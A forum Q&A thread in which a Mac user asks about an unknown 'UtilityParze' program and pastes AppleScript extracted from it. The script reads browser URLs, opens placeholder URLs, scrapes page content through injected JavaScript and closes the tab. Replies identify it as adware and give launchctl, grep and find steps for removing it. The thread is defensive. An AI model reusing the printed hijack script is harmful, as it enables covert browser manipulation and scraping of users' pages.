What is UtilityParze?

I’m using a Macbook Air with OS X Catalina.

Today when I opened Safari a security dialog popped up asking whether to allow UtilityParze to access Safari. I haven’t found any mention of this application online so far, but I found an executable at /Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParze in my filesystem.

It’s mostly not human-readable but here’s some embedded script:

if application "Safari" is running then 
    run script "tell application \"Safari\" to return URL of front document" 
end if

if application "Safari" is running then 
    tell application id (id of application "Safari") to open location "[URL_TO_OPEN]" 
    tell application id (id of application "Safari") to activate 
    delay 5.0 
end if

if application "Safari" is running then 
    run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window 
    tell application id (id of application \"Safari\") to open location \"[UA_URL]\" 
    tell application id (id of application \"Safari\") to set the content to the text of document 1 
    repeat until length of (content as string) is not 0 
        delay 0.2 
        tell application id (id of application \"Safari\") to set the content to the text of document 1 
    end repeat 
    tell front window of application \"Safari\" to close last tab 
    tell front window of application \"Safari\" to set current tab to tab activeIndex 
    return content as string" 
end if

if application "Google Chrome" is running then 
    run script "tell application \"Google Chrome\" to get URL of active tab of first window" 
end if

if application "Google Chrome" is running then 
    tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]" 
    tell application id (id of application "Google Chrome") to activate 
    delay 5.0 
end if

if application "Google Chrome" is running then
    tell application "Google Chrome"
        open location "[UA_URL]"
    end tell
end if

if application "Google Chrome" is running then 
    run script "tell application \"Google Chrome\" 
    set the activeUrl to get URL of front window's active tab 
    open location \"[UA_URL]\" 
    set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\" 
    repeat until length of (content as string) is not 0 
        delay 0.2 
        set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\" 
    end repeat 
    tell front window's active tab to close 
    set tabIndex to 0 
    repeat with currentTab in (tabs of (front window)) 
        set tabIndex to tabIndex + 1 
        if URL of currentTab is activeUrl then 
            set (active tab index of (front window)) to tabIndex 
            exit repeat 
        end if 
    end repeat 
    return content as string 
    end tell" 
end if

Has anyone heard of this program? So far I just denied it access but have not deleted it. I’m guessing it’s something annoying that initially reroutes to a page when I try to open a browser.

owengall

Posted 2020-01-12T15:19:16.953

Reputation: 43

Saw same thing this morning. Was warned about it so I deleted it. A google search only returned this post, seems you're the first person to mention this on the internet. – David Lartey – 2020-01-12T16:14:46.007

I would run an antimalware/antivirus scan. – vssher – 2020-01-12T16:41:46.953

Answers

I just (Sunday Jan 12, 2020 at about 9:52 am) had a similar "Utilityparve" prompt appear in Mojave asking for permission to access Google Chrome. I did not allow access.

I have had similar mysterious browser access requests in the past that were connected to adware that I had to manually clear out of the system.

"Macperformance" is an example that seems to repeatedly find its way into a very similar location in the "Library" of the active User. I don't know whether there's a direct connection between "UtilityParve" and "Macperformance", but right now both of them are present in my Library.

"Utilityparve is located in the "UpdatesMac" folder, whereas "Macperformance" is located in the "UpdateMac" folder.

Based on the lack of a description of its function online I will delete "Utilityparve" as well as "Macperformance" which is considered to be adware.

PCH

Posted 2020-01-12T15:19:16.953

Reputation: 16

Yeah, that description including having Macperformance matches mine. I’ll do the same. – owengall – 2020-01-13T14:24:07.360

Have you tried running e.g. launchctl list | grep Utility in a Terminal to see if a launch agent is running that in turn keeps the application running? If so, you should probably run launchctl unload com.UtilityParze (or whatever the identifier/name that shows up when listing previously) to make sure launchd does not try to keep the application alive, then delete all related files. launchctl list com.UtilityParze should give you a hint on what/where those files are.

The three most likely locations for the .plist definitions of this launch agent are:

/Library/LaunchAgents
/Library/LaunchDaemons
/Users/markus/Library/LaunchAgents

Look in all those folders for com.UtilityParze.plist. But they might use a stealth name so inspecting via launchctl is probably better. Another option is to grep for the suspicious name in all .plist definitions, something like:

grep -R Parze /Library/LaunchAgents
grep -R Parze ~/Library/LaunchAgents
sudo grep -R Parze /Library/LaunchDaemons

Launch agent definition files must include the path to an executable to do anything and if the malware creator didn't spread the files over many locations, all offending files are probably in one folder somewhere along with the executable. Find the executable and you'll probably find all other files to delete as well. But make sure to unload the agent first.

Yet another way to hopefully spot the malware files is running find on all of your libraries:

sudo find /Library -iname Parze
find ~/Library -iname Parze

Markus Amalthea Magnuson

Posted 2020-01-12T15:19:16.953

Reputation: 223

Thanks for the very helpful tips! I was not aware of how to find launch agents before so this will be helpful for identifying viruses in the future too. – owengall – 2020-01-13T14:30:07.737

An APP named 'Easyfind' can search the file very easily. I just searched 'UtilityParze', then output 4 result. I delete them all at once.

buyuno

Posted 2020-01-12T15:19:16.953

Reputation: 1